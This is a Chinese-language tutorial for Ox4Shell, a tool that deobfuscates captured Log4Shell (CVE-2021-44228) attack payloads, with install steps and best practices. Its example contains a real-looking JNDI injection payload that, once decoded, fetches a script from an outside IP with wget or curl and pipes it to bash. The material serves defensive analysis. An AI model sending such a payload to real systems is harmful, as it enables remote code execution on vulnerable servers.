Ox4Shell 使用教程
Ox4ShellDeobfuscate Log4Shell payloads with ease.项目地址:https://gitcode.com/gh_mirrors/ox/Ox4Shell
项目介绍
Ox4Shell 是一款针对 Log4Shell Payload 代码反混淆工具。自从 Log4Shell 漏洞(CVE-2021-44228)被发现之后,很多工具都开始尝试对 Log4Shell Payload 进行混淆处理,以便更好地利用这个漏洞去实施攻击。这也给广大研究人员带来了很大的麻烦。Ox4Shell 旨在帮助广大研究人员查看经过混淆处理的 Log4Shell Payload 的真实内容。
项目快速启动
安装
首先,克隆项目仓库到本地:
git clone https://github.com/ox-eye/Ox4Shell.git
cd Ox4Shell
使用
Ox4Shell 提供了命令行工具来反混淆 Log4Shell Payload。以下是一个简单的使用示例:
python ox4shell.py --help
要反混淆一个 Payload,可以使用以下命令:
python ox4shell.py -p "${jndi:ldap://1.1.1.1:1389/Basic/Command/Base64/KHdnZXQgLU8gLSBodHRwOi8vMTg1LjI1MC4xNDguMTU3OjgwMDUvYWNjfHxjdXJsIC1vIC0gaHR0cDovLzE4NS4yNTAuMTQ4LjE1Nzo4MDA1L2FjYyl8L2Jpbi9iYXNoIA==}"
应用案例和最佳实践
应用案例
假设你捕获到一个经过混淆的 Log4Shell Payload:
${jndi:ldap://1.1.1.1:1389/Basic/Command/Base64/KHdnZXQgLU8gLSBodHRwOi8vMTg1LjI1MC4xNDguMTU3OjgwMDUvYWNjfHxjdXJsIC1vIC0gaHR0cDovLzE4NS4yNTAuMTQ4LjE1Nzo4MDA1L2FjYyl8L2Jpbi9iYXNoIA==}
使用 Ox4Shell 反混淆后,可以看到攻击者的真实意图:
${jndi:ldap://1.1.1.1:1389/Basic/(wget -O - http://185.250.148.157:8005/acc||curl -o - http://185.250.148.157:8005/acc)|/bin/bash}
最佳实践
- 定期更新工具:确保使用最新版本的 Ox4Shell,以便支持最新的混淆技术。
- 结合其他安全工具:将 Ox4Shell 与其他安全监控工具结合使用,以便更好地检测和响应 Log4Shell 攻击。
- 培训和教育:对团队成员进行培训,提高他们对 Log4Shell 漏洞和相关工具的认识。
典型生态项目
相关项目
- Log4j Scanner:一个用于检测 Log4j 漏洞的工具,可以与 Ox4Shell 结合使用,提高检测效率。
- CyberChef:一个强大的数据处理工具,可以用于进一步分析和处理反混淆后的 Payload。
- Snort:一个网络入侵检测系统,可以配置规则来检测 Log4Shell 攻击流量。
通过结合这些工具,可以构建一个更全面的安全防护体系,有效应对 Log4Shell 漏洞带来的威胁。
Ox4ShellDeobfuscate Log4Shell payloads with ease.项目地址:https://gitcode.com/gh_mirrors/ox/Ox4Shell
创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
